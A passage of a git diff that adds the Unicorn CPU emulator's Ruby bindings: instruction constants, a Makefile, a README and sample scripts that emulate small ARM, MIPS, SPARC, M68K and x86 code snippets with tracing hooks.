+UC_X86_INS_VPMOVZXBW = 1161 +UC_X86_INS_VPMOVZXDQ = 1162 +UC_X86_INS_VPMOVZXWD = 1163 +UC_X86_INS_VPMOVZXWQ = 1164 +UC_X86_INS_VPMULDQ = 1165 +UC_X86_INS_VPMULHRSW = 1166 +UC_X86_INS_VPMULHUW = 1167 +UC_X86_INS_VPMULHW = 1168 +UC_X86_INS_VPMULLD = 1169 +UC_X86_INS_VPMULLQ = 1170 +UC_X86_INS_VPMULLW = 1171 +UC_X86_INS_VPMULUDQ = 1172 +UC_X86_INS_VPORD = 1173 +UC_X86_INS_VPORQ = 1174 +UC_X86_INS_VPOR = 1175 +UC_X86_INS_VPPERM = 1176 +UC_X86_INS_VPROTB = 1177 +UC_X86_INS_VPROTD = 1178 +UC_X86_INS_VPROTQ = 1179 +UC_X86_INS_VPROTW = 1180 +UC_X86_INS_VPSADBW = 1181 +UC_X86_INS_VPSCATTERDD = 1182 +UC_X86_INS_VPSCATTERDQ = 1183 +UC_X86_INS_VPSCATTERQD = 1184 +UC_X86_INS_VPSCATTERQQ = 1185 +UC_X86_INS_VPSHAB = 1186 +UC_X86_INS_VPSHAD = 1187 +UC_X86_INS_VPSHAQ = 1188 +UC_X86_INS_VPSHAW = 1189 +UC_X86_INS_VPSHLB = 1190 +UC_X86_INS_VPSHLD = 1191 +UC_X86_INS_VPSHLQ = 1192 +UC_X86_INS_VPSHLW = 1193 +UC_X86_INS_VPSHUFB = 1194 +UC_X86_INS_VPSHUFD = 1195 +UC_X86_INS_VPSHUFHW = 1196 +UC_X86_INS_VPSHUFLW = 1197 +UC_X86_INS_VPSIGNB = 1198 +UC_X86_INS_VPSIGND = 1199 +UC_X86_INS_VPSIGNW = 1200 +UC_X86_INS_VPSLLDQ = 1201 +UC_X86_INS_VPSLLD = 1202 +UC_X86_INS_VPSLLQ = 1203 +UC_X86_INS_VPSLLVD = 1204 +UC_X86_INS_VPSLLVQ = 1205 +UC_X86_INS_VPSLLW = 1206 +UC_X86_INS_VPSRAD = 1207 +UC_X86_INS_VPSRAQ = 1208 +UC_X86_INS_VPSRAVD = 1209 +UC_X86_INS_VPSRAVQ = 1210 +UC_X86_INS_VPSRAW = 1211 +UC_X86_INS_VPSRLDQ = 1212 +UC_X86_INS_VPSRLD = 1213 +UC_X86_INS_VPSRLQ = 1214 +UC_X86_INS_VPSRLVD = 1215 +UC_X86_INS_VPSRLVQ = 1216 +UC_X86_INS_VPSRLW = 1217 +UC_X86_INS_VPSUBB = 1218 +UC_X86_INS_VPSUBD = 1219 +UC_X86_INS_VPSUBQ = 1220 +UC_X86_INS_VPSUBSB = 1221 +UC_X86_INS_VPSUBSW = 1222 +UC_X86_INS_VPSUBUSB = 1223 +UC_X86_INS_VPSUBUSW = 1224 +UC_X86_INS_VPSUBW = 1225 +UC_X86_INS_VPTESTMD = 1226 +UC_X86_INS_VPTESTMQ = 1227 +UC_X86_INS_VPTESTNMD = 1228 +UC_X86_INS_VPTESTNMQ = 1229 +UC_X86_INS_VPTEST = 1230 +UC_X86_INS_VPUNPCKHBW = 1231 +UC_X86_INS_VPUNPCKHDQ = 1232 +UC_X86_INS_VPUNPCKHQDQ = 1233 +UC_X86_INS_VPUNPCKHWD = 1234 +UC_X86_INS_VPUNPCKLBW = 1235 +UC_X86_INS_VPUNPCKLDQ = 1236 +UC_X86_INS_VPUNPCKLQDQ = 1237 +UC_X86_INS_VPUNPCKLWD = 1238 +UC_X86_INS_VPXORD = 1239 +UC_X86_INS_VPXORQ = 1240 +UC_X86_INS_VPXOR = 1241 +UC_X86_INS_VRCP14PD = 1242 +UC_X86_INS_VRCP14PS = 1243 +UC_X86_INS_VRCP14SD = 1244 +UC_X86_INS_VRCP14SS = 1245 +UC_X86_INS_VRCP28PD = 1246 +UC_X86_INS_VRCP28PS = 1247 +UC_X86_INS_VRCP28SD = 1248 +UC_X86_INS_VRCP28SS = 1249 +UC_X86_INS_VRCPPS = 1250 +UC_X86_INS_VRCPSS = 1251 +UC_X86_INS_VRNDSCALEPD = 1252 +UC_X86_INS_VRNDSCALEPS = 1253 +UC_X86_INS_VRNDSCALESD = 1254 +UC_X86_INS_VRNDSCALESS = 1255 +UC_X86_INS_VROUNDPD = 1256 +UC_X86_INS_VROUNDPS = 1257 +UC_X86_INS_VROUNDSD = 1258 +UC_X86_INS_VROUNDSS = 1259 +UC_X86_INS_VRSQRT14PD = 1260 +UC_X86_INS_VRSQRT14PS = 1261 +UC_X86_INS_VRSQRT14SD = 1262 +UC_X86_INS_VRSQRT14SS = 1263 +UC_X86_INS_VRSQRT28PD = 1264 +UC_X86_INS_VRSQRT28PS = 1265 +UC_X86_INS_VRSQRT28SD = 1266 +UC_X86_INS_VRSQRT28SS = 1267 +UC_X86_INS_VRSQRTPS = 1268 +UC_X86_INS_VRSQRTSS = 1269 +UC_X86_INS_VSCATTERDPD = 1270 +UC_X86_INS_VSCATTERDPS = 1271 +UC_X86_INS_VSCATTERPF0DPD = 1272 +UC_X86_INS_VSCATTERPF0DPS = 1273 +UC_X86_INS_VSCATTERPF0QPD = 1274 +UC_X86_INS_VSCATTERPF0QPS = 1275 +UC_X86_INS_VSCATTERPF1DPD = 1276 +UC_X86_INS_VSCATTERPF1DPS = 1277 +UC_X86_INS_VSCATTERPF1QPD = 1278 +UC_X86_INS_VSCATTERPF1QPS = 1279 +UC_X86_INS_VSCATTERQPD = 1280 +UC_X86_INS_VSCATTERQPS = 1281 +UC_X86_INS_VSHUFPD = 1282 +UC_X86_INS_VSHUFPS = 1283 +UC_X86_INS_VSQRTPD = 1284 +UC_X86_INS_VSQRTPS = 1285 +UC_X86_INS_VSQRTSD = 1286 +UC_X86_INS_VSQRTSS = 1287 +UC_X86_INS_VSTMXCSR = 1288 +UC_X86_INS_VSUBPD = 1289 +UC_X86_INS_VSUBPS = 1290 +UC_X86_INS_VSUBSD = 1291 +UC_X86_INS_VSUBSS = 1292 +UC_X86_INS_VTESTPD = 1293 +UC_X86_INS_VTESTPS = 1294 +UC_X86_INS_VUNPCKHPD = 1295 +UC_X86_INS_VUNPCKHPS = 1296 +UC_X86_INS_VUNPCKLPD = 1297 +UC_X86_INS_VUNPCKLPS = 1298 +UC_X86_INS_VZEROALL = 1299 +UC_X86_INS_VZEROUPPER = 1300 +UC_X86_INS_WAIT = 1301 +UC_X86_INS_WBINVD = 1302 +UC_X86_INS_WRFSBASE = 1303 +UC_X86_INS_WRGSBASE = 1304 +UC_X86_INS_WRMSR = 1305 +UC_X86_INS_XABORT = 1306 +UC_X86_INS_XACQUIRE = 1307 +UC_X86_INS_XBEGIN = 1308 +UC_X86_INS_XCHG = 1309 +UC_X86_INS_XCRYPTCBC = 1310 +UC_X86_INS_XCRYPTCFB = 1311 +UC_X86_INS_XCRYPTCTR = 1312 +UC_X86_INS_XCRYPTECB = 1313 +UC_X86_INS_XCRYPTOFB = 1314 +UC_X86_INS_XEND = 1315 +UC_X86_INS_XGETBV = 1316 +UC_X86_INS_XLATB = 1317 +UC_X86_INS_XRELEASE = 1318 +UC_X86_INS_XRSTOR = 1319 +UC_X86_INS_XRSTOR64 = 1320 +UC_X86_INS_XRSTORS = 1321 +UC_X86_INS_XRSTORS64 = 1322 +UC_X86_INS_XSAVE = 1323 +UC_X86_INS_XSAVE64 = 1324 +UC_X86_INS_XSAVEC = 1325 +UC_X86_INS_XSAVEC64 = 1326 +UC_X86_INS_XSAVEOPT = 1327 +UC_X86_INS_XSAVEOPT64 = 1328 +UC_X86_INS_XSAVES = 1329 +UC_X86_INS_XSAVES64 = 1330 +UC_X86_INS_XSETBV = 1331 +UC_X86_INS_XSHA1 = 1332 +UC_X86_INS_XSHA256 = 1333 +UC_X86_INS_XSTORE = 1334 +UC_X86_INS_XTEST = 1335 +UC_X86_INS_FDISI8087_NOP = 1336 +UC_X86_INS_FENI8087_NOP = 1337 +UC_X86_INS_ENDING = 1338 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/Makefile b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/Makefile new file mode 100644 index 0000000..9d52de9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/Makefile @@ -0,0 +1,11 @@ +# Ruby binding for Unicorn engine. Sascha Schirra <sashs@scoding.de> + +.PHONY: gen_const + +# Use bundle install && rake to install gem and test +install: gen_const + cd unicorn_gem && rake build + cd unicorn_gem && gem install --local pkg/unicorn-engine-1.0.1.gem + +gen_const: + cd .. && python const_generator.py ruby diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/README.md b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/README.md new file mode 100644 index 0000000..67a2109 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/README.md @@ -0,0 +1,24 @@ +# Installation + +## Software requirements + +### Linux +- ruby >= 1.9.3 +- rubygems +- make +- gcc + +### Mac OS +- ruby >= 1.9.3 +- rubygems +- make +- XCode + +## Install unicorn + * cd path_to_unicorn + * ./make.sh install + +## Install ruby binding + * cd bindings/ruby + * make install + \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_arm.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_arm.rb new file mode 100644 index 0000000..f9f8c1e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_arm.rb @@ -0,0 +1,106 @@ +#!/usr/bin/env ruby + +require 'unicorn_engine' +require 'unicorn_engine/arm_const' + +include UnicornEngine + +# code to be emulated +ARM_CODE = "\x37\x00\xa0\xe3\x03\x10\x42\xe0" # mov r0, #0x37; sub r1, r2, r3 +THUMB_CODE = "\x83\xb0" # sub sp, #0xc +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +$hook_block = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) +end + + +# callback for tracing instructions +$hook_code = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) +end + + +# Test ARM +def test_arm() + puts("Emulate ARM code") + begin + # Initialize emulator in ARM mode + mu = Uc.new UC_ARCH_ARM, UC_MODE_ARM + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, ARM_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_R0, 0x1234) + mu.reg_write(UC_ARM_REG_R2, 0x6789) + mu.reg_write(UC_ARM_REG_R3, 0x3333) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, $hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, $hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + ARM_CODE.bytesize) + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + r0 = mu.reg_read(UC_ARM_REG_R0) + r1 = mu.reg_read(UC_ARM_REG_R1) + puts(">>> R0 = 0x%x" % r0) + puts(">>> R1 = 0x%x" % r1) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +def test_thumb() + puts("Emulate THUMB code") + begin + # Initialize emulator in thumb mode + mu = Uc.new UC_ARCH_ARM, UC_MODE_THUMB + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, THUMB_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_SP, 0x1234) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, $hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, $hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS | 1, ADDRESS + THUMB_CODE.bytesize) + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + sp = mu.reg_read(UC_ARM_REG_SP) + puts(">>> SP = 0x%x" % sp) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +test_arm() +puts("=" * 20) +test_thumb() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_arm64.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_arm64.rb new file mode 100644 index 0000000..37d9511 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_arm64.rb @@ -0,0 +1,69 @@ +#!/usr/bin/env ruby +# Sample code for ARM64 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> +# Ruby sample ported by Sascha Schirra <sashs82@gmail.com> +require 'unicorn_engine' +require 'unicorn_engine/arm64_const' + +include UnicornEngine + +# code to be emulated +ARM64_CODE = "\xab\x01\x0f\x8b" #add x11, x13, x15 + +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +$hook_block = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) +end + + +# callback for tracing instructions +$hook_code = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) +end + + +# Test ARM64 +def test_arm64() + puts("Emulate ARM64 code") + begin + # Initialize emulator in ARM mode + mu = Uc.new UC_ARCH_ARM64, UC_MODE_ARM + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, ARM64_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM64_REG_X11, 0x1234) + mu.reg_write(UC_ARM64_REG_X13, 0x6789) + mu.reg_write(UC_ARM64_REG_X15, 0x3333) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, $hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, $hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + ARM64_CODE.bytesize) + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + x11 = mu.reg_read(UC_ARM64_REG_X11) + x13 = mu.reg_read(UC_ARM64_REG_X13) + x15 = mu.reg_read(UC_ARM64_REG_X15) + puts(">>> X11 = 0x%x" % x11) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +test_arm64() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_m68k.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_m68k.rb new file mode 100644 index 0000000..fc2522c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_m68k.rb @@ -0,0 +1,65 @@ +#!/usr/bin/env ruby +# Sample code for ARM of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> +# Ruby sample ported by Sascha Schirra <sashs82@gmail.com> + +require 'unicorn_engine' +require 'unicorn_engine/m68k_const' + +include UnicornEngine + +# code to be emulated +M68K_CODE = "\x76\xed" # movq #-19, %d3 +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +$hook_block = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) +end + + +# callback for tracing instructions +$hook_code = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) +end + + +# Test m68k +def test_m68k() + puts("Emulate M68K code") + begin + # Initialize emulator in m68k mode + mu = Uc.new UC_ARCH_M68K, UC_MODE_BIG_ENDIAN + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, M68K_CODE) + + # initialize machine registers + mu.reg_write(UC_M68K_REG_D3, 0x1234) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, $hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, $hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + M68K_CODE.bytesize) + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + d3 = mu.reg_read(UC_M68K_REG_D3) + puts(">>> D3 = 0x%x" % d3) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +test_m68k() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_mips.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_mips.rb new file mode 100644 index 0000000..c13a9cf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_mips.rb @@ -0,0 +1,104 @@ +#!/usr/bin/env ruby +# Sample code for MIPS of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> +# Ruby sample ported by Sascha Schirra <sashs82@gmail.com> +require 'unicorn_engine' +require 'unicorn_engine/mips_const' + +include UnicornEngine + +# code to be emulated +MIPS_CODE_EB = "\x34\x21\x34\x56" # ori $at, $at, 0x3456; +MIPS_CODE_EL = "\x56\x34\x21\x34" # ori $at, $at, 0x3456; + +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +$hook_block = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) +end + + +# callback for tracing instructions +$hook_code = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) +end + +# Test MIPS EB +def test_mips_eb() + puts("Emulate MIPS code (big-endian)") + begin + # Initialize emulator in MIPS32 + EB mode + mu = Uc.new UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, MIPS_CODE_EB) + + # initialize machine registers + mu.reg_write(UC_MIPS_REG_1, 0x6789) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, $hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, $hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EB.bytesize) + + # now puts out some registers + puts(">>> Emulation done. Below is the CPU context") + + r1 = mu.reg_read(UC_MIPS_REG_1) + puts(">>> r1 = 0x%x" % r1) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +# Test MIPS EL +def test_mips_el() + puts("Emulate MIPS code (little-endian)") + begin + # Initialize emulator in MIPS32 + EL mode + mu = Uc.new UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, MIPS_CODE_EL) + + # initialize machine registers + mu.reg_write(UC_MIPS_REG_1, 0x6789) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, $hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, $hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EL.bytesize) + + # now puts out some registers + puts(">>> Emulation done. Below is the CPU context") + + r1 = mu.reg_read(UC_MIPS_REG_1) + puts(">>> r1 = 0x%x" % r1) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +test_mips_eb() +puts("=" * 20) +test_mips_el() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_sparc.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_sparc.rb new file mode 100644 index 0000000..a4baf18 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_sparc.rb @@ -0,0 +1,65 @@ +#!/usr/bin/env ruby +# Sample code for SPARC of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> +# Ruby sample ported by Sascha Schirra <sashs82@gmail.com> +require 'unicorn_engine' +require 'unicorn_engine/sparc_const' + +include UnicornEngine + +# code to be emulated +SPARC_CODE = "\x86\x00\x40\x02" # add %g1, %g2, %g3; +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +$hook_block = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) +end + + +# callback for tracing instructions +$hook_code = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) +end + +# Test SPARC +def test_sparc() + puts("Emulate SPARC code") + begin + # Initialize emulator in SPARC EB mode + mu = Uc.new UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, SPARC_CODE) + + # initialize machine registers + mu.reg_write(UC_SPARC_REG_G1, 0x1230) + mu.reg_write(UC_SPARC_REG_G2, 0x6789) + mu.reg_write(UC_SPARC_REG_G3, 0x5555) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, $hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, $hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + SPARC_CODE.bytesize) + + # now puts out some registers + puts(">>> Emulation done. Below is the CPU context") + + g3 = mu.reg_read(UC_SPARC_REG_G3) + puts(">>> G3 = 0x%x" %g3) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +test_sparc() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_x86.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_x86.rb new file mode 100644 index 0000000..00c480a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_x86.rb @@ -0,0 +1,552 @@ +#!/usr/bin/env ruby +require 'unicorn_engine' +require 'unicorn_engine/x86_const' + +include UnicornEngine + +X86_CODE32 = "\x41\x4a" # INC ecx; DEC edx +X86_CODE32_LOOP = "\x41\x4a\xeb\xfe" # INC ecx; DEC edx; JMP self-loop +X86_CODE32_MEM_READ = "\x8B\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx +X86_CODE32_MEM_WRITE = "\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov [0xaaaaaaaa], ecx; INC ecx; DEC edx +X86_CODE64 = "\x41\xBC\x3B\xB0\x28\x2A\x49\x0F\xC9\x90\x4D\x0F\xAD\xCF\x49\x87\xFD\x90\x48\x81\xD2\x8A\xCE\x77\x35\x48\xF7\xD9\x4D\x29\xF4\x49\x81\xC9\xF6\x8A\xC6\x53\x4D\x87\xED\x48\x0F\xAD\xD2\x49\xF7\xD4\x48\xF7\xE1\x4D\x19\xC5\x4D\x89\xC5\x48\xF7\xD6\x41\xB8\x4F\x8D\x6B\x59\x4D\x87\xD0\x68\x6A\x1E\x09\x3C\x59" +X86_CODE32_INOUT = "\x41\xE4\x3F\x4a\xE6\x46\x43" # INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx +X86_CODE64_SYSCALL = "\x0f\x05" # SYSCALL +X86_CODE16 = "\x00\x00" # add byte ptr [bx + si], al + +# memory address where emulation starts +ADDRESS = 0x1000000 + + +# callback for tracing basic blocks +HOOK_BLOCK = Proc.new do |uc, address, size, user_data | + puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) +end + +# callback for tracing instructions +HOOK_CODE = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) +end + + +# callback for tracing invalid memory access (READ or WRITE) +HOOK_MEM_INVALID = lambda do |uc, access, address, size, value, user_data| + if access == UC_MEM_WRITE_UNMAPPED + puts(">>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" % [address, size, value]) + # map this memory in with 2MB in size + uc.mem_map(0xaaaa0000, 2 * 1024*1024) + # return True to indicate we want to continue emulation + return true + else + puts(">>> Missing memory is being READ at 0x%x" % address) + # return False to indicate we want to stop emulation + return false + end +end + + +# callback for tracing memory access (READ or WRITE) +HOOK_MEM_ACCESS = Proc.new do |uc, access, address, size, value, user_data| + if access == UC_MEM_WRITE + puts(">>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" % [address, size, value]) + else # READ + puts(">>> Memory is being READ at 0x%x, data size = %u" % [address, size]) + end +end + +# callback for IN instruction +HOOK_IN = lambda do |uc, port, size, user_data| + eip = uc.reg_read(UC_X86_REG_EIP) + puts("--- reading from port 0x%x, size: %u, address: 0x%x" % [port, size, eip]) + if size == 1 + # read 1 byte to AL + return 0xf1 + end + if size == 2 + # read 2 byte to AX + return 0xf2 + end + if size == 4 + # read 4 byte to EAX + return 0xf4 + end + # we should never reach here + return 0 +end + + +# callback for OUT instruction +HOOK_OUT = Proc.new do |uc, port, size, value, user_data| + eip = uc.reg_read(UC_X86_REG_EIP) + puts("--- writing to port 0x%x, size: %u, value: 0x%x, address: 0x%x" % [port, size, value, eip]) + + # confirm that value is indeed the value of AL/AX/EAX + v = 0 + if size == 1 + # read 1 byte in AL + v = uc.reg_read(UC_X86_REG_AL) + end + if size == 2 + # read 2 bytes in AX + v = uc.reg_read(UC_X86_REG_AX) + end + if size == 4 + # read 4 bytes in EAX + v = uc.reg_read(UC_X86_REG_EAX) + end + + puts("--- register value = 0x%x" %v) +end + + +# Test X86 32 bit +def test_i386() + puts("Emulate i386 code") + begin + # Initialize emulator in X86-32bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_32 + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, HOOK_CODE) + mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED, HOOK_MEM_INVALID) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE32.bytesize) + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + puts(">>> ECX = 0x%x" % r_ecx) + puts(">>> EDX = 0x%x" % r_edx) + + # read from memory + tmp = mu.mem_read(ADDRESS, 2) + print(">>> Read 2 bytes from [0x%x] =" % (ADDRESS)) + tmp.each_byte { |i| print(" 0x%x" % i) } + + puts + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +def test_i386_loop() + puts("Emulate i386 code with infinite loop - wait for 2 seconds then stop emulation") + begin + # Initialize emulator in X86-32bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_32 + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_LOOP) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_LOOP.bytesize, 2 * UC_SECOND_SCALE) + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + puts(">>> ECX = 0x%x" % r_ecx) + puts(">>> EDX = 0x%x" % r_edx) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +def test_i386_invalid_mem_read() + puts("Emulate i386 code that read from invalid memory") + begin + # Initialize emulator in X86-32bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_32 + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_MEM_READ) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, HOOK_CODE) + + begin + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_READ.bytesize) + rescue UcError => e + puts("ERROR: %s" % e) + end + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + puts(">>> ECX = 0x%x" % r_ecx) + puts(">>> EDX = 0x%x" % r_edx) + + rescue UcError => e + print("ERROR: %s" % e) + end +end + + +def test_i386_invalid_mem_write() + puts("Emulate i386 code that write to invalid memory") + begin + # Initialize emulator in X86-32bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_32 + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_MEM_WRITE) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all basic blocks with customized callback + #mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) + + # tracing all instructions with customized callback + #mu.hook_add(UC_HOOK_CODE, HOOK_CODE) + + # intercept invalid memory events + mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, 